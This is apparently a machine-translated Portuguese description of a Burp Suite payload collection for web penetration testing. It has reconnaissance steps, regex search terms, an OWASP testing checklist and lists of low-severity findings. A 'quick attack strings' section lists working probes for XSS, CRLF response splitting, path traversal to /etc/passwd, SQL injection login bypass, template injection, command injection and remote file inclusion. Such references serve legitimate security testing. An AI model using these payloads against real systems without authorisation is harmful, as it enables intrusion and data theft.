IntruderPayloads - Uma coleção de cargas úteis de intrusão Burpsuite, listas de fuzz e carregamentos de arquivos
Uma coleção de cargas úteis de Burpsuite Intruder e listas de fuzz e metodologia pentesting. Para retirar todos os reposes de terceiros, execute install.sh no mesmo diretório da pasta IntruderPayloads.
- Burpsuite Spider com apresentação inteligente de formulários
- Rastreamento manual do site através do proxy do Burpsuite e envio de cargas úteis INJECTX para rastreamento
- Varredura passiva Burpsuite
- Ferramentas de noivado Burpsuite> Pesquisa>
<form|<input|url=|path=|load=|INJECTX|Found|<!--|Exception|Query|ORA|SQL|error|Location|crowdshield|xerosecurity|username|password|document\.|location\.|eval\(|exec\(|\?wsdl|\.wsdl
- Ferramentas de engajamento Burpsuite> Encontrar comentários
- Ferramentas de engajamento Burpsuite> Encontre scripts
- Ferramentas de engajamento Burpsuite> Encontrar referências
- Ferramentas de engajamento Burpsuite> Analise o alvo
- Ferramentas de engajamento Burpsuite> Descubra o conteúdo
- Burpsuite Intruder> arquivo / diretório força bruta
- Burpsuite Intruder> métodos HTTP, agentes de usuários, etc.
- Enumerar todas as tecnologias de software, métodos HTTP e potenciais vetores de ataque
- Compreender a função do site, quais tipos de dados são armazenados ou valiosos e que tipo de funções atacar, etc.
NUMERAÇÃO:
VECTORES:
QUADROS DE PESQUISA:
Apenas alguns termos regex úteis para pesquisar passivamente usando o Burpsuite ou qualquer outro proxy da Web ...
QUICK ATTACK STRINGS:
não é uma lista completa por qualquer meio, mas quando você está testando manualmente e andando por sites e precisa de uma cópia / pasta rápida, isso pode ser útil ...
LISTA DE VERIFICAÇÃO DE TESTES OWASP:
BAIXA SEVERIDADE:
uma lista de descobertas de baixa gravidade que provavelmente estão fora do escopo para a maioria dos programas de recompensas de insetos, mas ainda são úteis para fazer referência para testes normais de penetração na web.
- SISTEMA OPERACIONAL
- SERVIDOR WEB
- SERVIDORES DE BASE DE DADOS
- LINGUAGENS DE PROGRAMAÇÃO
- PLUGINS / VERSÕES
- PORTOS ABERTOS
- USERNAMES
- SERVIÇOS
- WEB SPIDERING
- GOOGLE HACKING
VECTORES:
- FORMULÁRIOS DE ENTRADA
- GET / POST PARAMS
- URI / REST STRUCTURE
- BISCOITOS
- HEADERS
QUADROS DE PESQUISA:
Apenas alguns termos regex úteis para pesquisar passivamente usando o Burpsuite ou qualquer outro proxy da Web ...
fname|phone|id|org_name|name|email
QUICK ATTACK STRINGS:
não é uma lista completa por qualquer meio, mas quando você está testando manualmente e andando por sites e precisa de uma cópia / pasta rápida, isso pode ser útil ...
Company
First Last
username
[email protected]
Password123$
+1416312384
google.com
https://google.com
//google.com
.google.com
https://google.com/.injectx/rfi_vuln.txt
https://google.com/.injectx/rfi_vuln.txt?`whoami`
https://google.com/.injectx/rfi_vuln.txt.png
https://google.com/.injectx/rfi_vuln.txt.html
12188
01/01/1979
4242424242424242
INJECTX
'>"></INJECTX>(1)
javascript:alert(1)//
"><img/onload=alert(1)>' --
"></textarea><img/onload=alert(1)>' --
INJECTX'>"><img/src="https://google.com/.injectx/xss_vuln.png"></img>
'>"><iframe/onload=alert(1)></iframe>
INJECTX'>"><ScRiPt>confirm(1)<ScRiPt>
"></textarea><img/onload=alert(1)>' -- // INJECTX <!--
"><img/onload=alert(1)>' -- // INJECTX <!--
INJECTX'"><h1>X<!--
INJECTX"><h1>X
en%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
../../../../../../../../../../../etc/passwd
{{4+4}}
sleep 5; sleep 5 || sleep 5 | sleep 5 & sleep 5 && sleep 5
admin" or "1"="1"--
admin' or '1'='1'--
firstlastcompany%0a%0d
LISTA DE VERIFICAÇÃO DE TESTES OWASP:
- Aranhas, Robôs e Crawlers IG-001
- Descoberta / Reconhecimento do Search Engine IG-002
- Identificar os pontos de entrada do aplicativo IG-003
- Teste de Aplicação Web Fingerprint IG-004
- Descoberta de Aplicação IG-005
- Análise de códigos de erro IG-006
- Teste SSL / TLS (Versão SSL, Algoritmos, Comprimento da chave, Cert. Digital) Validade) - Fraqueza SSL CM-001
- DB Listener Testing - DB Ouvinte fraco CM-002
- Testes de Gerenciamento de Configuração de Infraestrutura - Fracasso de Gerenciamento de Configuração de Infra-estrutura
- Teste de Gerenciamento de Configuração de Aplicação - Gerenciamento de Configuração de Aplicativos fraqueza CM-004
- Testando o Gerenciamento de Extensões de Arquivo - Processamento de extensões de arquivo CM-005
- Arquivos antigos, de backup e não referenciados - Arquivos antigos, de backup e não referenciados CM-006
- Interfaces de infraestrutura e administração de aplicativos - Acesso às interfaces de administração CM-007
- Testando Métodos HTTP e XST - Métodos HTTP habilitados, XST permitido, Verbo HTTP CM-008
- Transporte de credenciais através de um canal criptografado - Transporte de credenciais através de um canal criptografado AT-001
- Testes para enumeração de usuários - Enumeração de usuários AT-002
- Testando para a conta de usuário Guessable (Dicionário) - Conta de usuário susceptível de AT-003
- Teste de Força Bruta - Credenciais Forçamento Bruto AT-004
- Teste para ignorar o esquema de autenticação - Ignorando o esquema de autenticação AT-005
- Teste de senha de lembrança vulnerável e reinicialização de pwd - Senha de lembrança vulnerável, reset de pwd fraco AT-006
- Teste de Logout e Gerenciamento de cache do navegador - - Função de logout não implementada corretamente, fraqueza de cache do navegador AT-007
- Testes para CAPTCHA - Implementação do Captcha fraco AT-008
- Teste de autenticação de múltiplos fatores - Autenticação de fatores múltiplos fracos AT-009
- Teste de condições de corrida - vulnerabilidade de condições de corrida AT-010
- Testando o Esquema de Gerenciamento de Sessão - Ignorando o Esquema de Gerenciamento de Sessão, Token de Sessão Fraca SM-001
- Atestados de Teste de Cookies - Os cookies são definidos não apenas 'HTTP Only', 'Seguro' e sem tempo de validade SM-002
- Teste de Fixação de Sessão - Fixação de Sessão SM-003
- Teste de Variáveis de Sessão Expostas - Variáveis de sessão sensíveis expostas SM-004
- Testes para CSRF - CSRF SM-005
- Teste de Path Traversal - Path Traversal AZ-001
- Teste para ignorar o esquema de autorização - Ignorar o esquema de autorização AZ-002
- Teste de Escalação Privilegiada - Escalação Privilegiada AZ-003
- Testing for Business Logic - lógica de negócios de bloqueio BL-001
- Testes para o Criptografado Cross Site Scripting - XSS DV-001 refletido
- Teste de Stored Cross Site Scripting - armazenado XSS DV-002
- Testando scripts baseados no site do DOM - DOM XSS DV-003
- Teste de Cross Site Flashing - Cross Site Flashing DV-004
- SQL Injection - SQL Injection DV-005
- Injeção LDAP - Injeção LDAP DV-006
- Injeção de ORM - Injeção de ORM DV-007
- Injeção XML - Injeção XML DV-008
- Injeção SSI - Injeção SSI DV-009
- Injeção XPath - Injeção XPath DV-010
- Injeção IMAP / SMTP - Injeção IMAP / SMTP DV-011
- Injeção de código - Injeção de código DV-012
- Comando do SO - Comando do SO DV-013
- Desbordamento de buffer: estouro de buffer DV-014
- Vulnerabilidade incubada - Vulnerabilidade incubada DV-015
- Teste de Divisão / Contrabando HTTP - Divisão HTTP, Contrabando DV-016
- Teste de ataques de curinga SQL - vulnerabilidade de curinga SQL DS-001
- Bloqueando contas de clientes - Bloqueando contas de clientes DS-002
- Testes para transbordamentos do buffer do DoS - buffer overflows DS-003
- Alocação de objeto especificado pelo usuário - Alocação de objeto especificada pelo usuário DS-004
- Entrada do usuário como um contador de loop - Entrada do usuário como um contador de loop DS-005
- Escrevendo dados fornecidos pelo usuário ao disco - Escrevendo dados fornecidos pelo usuário ao disco DS-006
- Falha na liberação de recursos - Falha na liberação de recursos DS-007
- Armazenando muito dados na sessão - Armazenando muito dados na sessão DS-008
- WS Information Gathering - NA WS-001
- Testando WSDL - WSDL Fraqueza WS-002
- Teste Estrutural XML - Estrutura XML Fraca WS-003
- Teste de nível de conteúdo XML - nível de conteúdo XML WS-004
- HTTP GET parameters / REST Testing - WS HTTP GET parameters / REST WS-005
- Naughty SOAP anexos - WS Naughty SOAP anexos WS-006
- Testes de repetição - WS Replay Testing WS-007
- Vulnerabilidades AJAX - NA AJ-001
- AJAX Testing - AJAX fraqueza AJ-002
BAIXA SEVERIDADE:
uma lista de descobertas de baixa gravidade que provavelmente estão fora do escopo para a maioria dos programas de recompensas de insetos, mas ainda são úteis para fazer referência para testes normais de penetração na web.
- Mensagens de erro descritivo (p. Ex., Rastreios de pilha, erro de aplicativo ou servidor).
- HTTP 404 códigos / páginas ou outros HTTP não-200 códigos / páginas.
- Divulgação de Banner sobre serviços comuns / públicos.
- Divulgação de arquivos ou diretórios públicos conhecidos (por exemplo, robots.txt).
- Click-Jacking e problemas apenas exploráveis através de cliques.
- CSRF em formulários disponíveis para usuários anônimos (por exemplo, o formulário de contato).
- Solicitação de Pedido de Cross-Site de Logout (log-CSRF).
- Presença do aplicativo ou navegador "autocompletar" ou "salvar senha".
- Falta de bandeiras de cookie seguras e HTTPOnly.
- Falta de Segurança Speedbump ao sair do site.
- Débito Captcha / Captcha Fraco
- Enumeração de nome de usuário via Login Página mensagem de erro
- Enumeração de nome de usuário via Senha esquecida, mensagem de erro
- Login ou Forgot Password página força bruta e bloqueio de conta não forçado.
- Método HTTP OPTIONS / TRACE habilitado
- Ataques SSL como BEAST, BREACH, ataque de renegociação
- O segredo SSL não está habilitado
- Conjuntos de criptografia SSL Insegáveis
- O cabeçalho anti-MIME-Sniffing X-Content-Type-Options
- Falta cabeçalhos de segurança HTTP
- Melhores práticas de segurança sem acompanhar a exploração de prova de conceito
- Mensagens de erro descritivo (p. Ex., Rastreios de pilha, erro de aplicativo ou servidor).
- HTTP 404 códigos / páginas ou outros HTTP não-200 códigos / páginas.
- Ataques de negação de serviço.
- Fingerprinting / banner divulgação em serviços comuns / públicos.
- Divulgação de arquivos ou diretórios públicos conhecidos (por exemplo, robots.txt).
- Clickjacking e problemas apenas exploráveis através do clique.
- CSRF em formulários não sensíveis.
- Solicitação de Pedido de Cross-Site de Logout (log-CSRF).
- Presença do aplicativo ou navegador "autocompletar" ou "salvar senha".
- Falta de sinalizadores seguros / HTTPOnly em cookies não-sensíveis.
- Falta de Segurança Speedbump ao sair do site.
- Débito Captcha / Captcha Fraco
- Login ou Forgot Password página força bruta e bloqueio de conta não forçado.
- OPÇÕES Método HTTP habilitado
- Scripts de conteúdo misto HTTPS
- Bibliotecas vulneráveis conhecidas
- Ataques em serviços de anúncios de terceiros
- Enumeração de nome de usuário / e-mail via Senha esquecida ou Página de login
- Falta cabeçalhos de segurança HTTP
- Strict-Transport-Security não habilitado para HTTPS
- X-Frame-Options
- X-XSS-Protection
- X-Content-Type-Options
- Política de segurança de conteúdo, X-Content-Security-Policy, X-WebKit-CSP
- Conteúdo-Segurança-Política-relatório somente
- Problemas SSL, por exemplo,
- Ataques SSL como BEAST, BREACH, ataque de renegociação
- O segredo SSL não está habilitado
- Conjuntos de cifra fracos / inseguras SSL
- Falta de registros SPF (Spoofing por e-mail)
- Auto-completar habilitado nos campos de senha
- HTTP habilitado
- ID de sessão ou Login Sent Over HTTP
- Cookies inseguros
- Cross-Domain.xml permite todos os domínios
- Domínios permitidos HTML5
- Política de origem cruzada
- Content Sniffing Not Disabled
- Enumeração de conta de redefinição de senha
- Abuso de Formulário HTML (Negação de Serviço)
- Idade do HSTS fraca (86,000 ou menos)
- Falta de Política de Segurança de Senha (Senhas Forçadas Brutas)
- Teste físico
- Ataques de negação de serviço
- Ataques de Exaustão de Recursos
- Questões relacionadas à limitação de taxa
- Login ou Forgot Password página força bruta e bloqueio de conta não aplicado
- api * .netflix.com escuta na porta 80
- Política de acesso entre domínios abrangida por * .netflix.com
- Nome de usuário / Enumeração de e-mail
- via mensagem de erro da Página de Login
- via mensagem de erro Esqueceu a senha
- via registro
- senha fraca
- Passagem fraca Captcha / Captcha
- Falta de sinalizadores seguros / HTTPOnly em cookies
- Cookie válido após o fim de sessão
- Cookie válido após a reinicialização da senha
- Vencimento de cookies
- Esqueceu a senha autologin
- Reutilização token Autologin
- Script do mesmo site
- Problemas SSL, por exemplo,
- Ataques SSL como BEAST, BREACH, ataque de renegociação
- O segredo SSL não está habilitado
- Conjuntos de cifra fracos / inseguras SSL
- Vulnerabilidades SSL relacionadas à configuração ou versão
- Mensagens de erro descritivo (p. Ex., Rastreios de pilha, erro de aplicativo ou servidor).
- HTTP 404 códigos / páginas ou outros HTTP não-200 códigos / páginas.
- Fingerprinting / banner divulgação em serviços comuns / públicos.
- Divulgação de arquivos ou diretórios públicos conhecidos (por exemplo, robots.txt).
- Clickjacking e problemas apenas exploráveis através do clique.
- CSRF em formulários disponíveis para usuários anônimos (por exemplo, o formulário de contato).
- Solicitação de Pedido de Cross-Site de Logout (log-CSRF).
- Falta a proteção CSRF na funcionalidade não-sensível
- Presença do aplicativo ou navegador "autocompletar" ou "salvar senha".
- Charset incorreto
- Autocompletar HTML
- OPÇÕES Método HTTP habilitado
- Método TRACE HTTP habilitado
- Faltando cabeçalhos de segurança HTTP, especificamente
- ( https://www.owasp.org/index.php/List_of_useful_HTTP_headers ), por exemplo,
- Strict-Transport-Security
- X-Frame-Options
- X-XSS-Protection
- X-Content-Type-Options
- Política de segurança de conteúdo, X-Content-Security-Policy, X-WebKit-CSP
- Conteúdo-Segurança-Política-relatório somente
- Problemas apenas presentes em navegadores antigos / antigos plugins / navegadores de software de fim de vida
- IE <9
- Chrome <40
- Firefox <35
- Safari <7
- Opera <13
- Relatórios de vulnerabilidade relacionados aos números de versão relatados de servidores web, serviços ou frameworks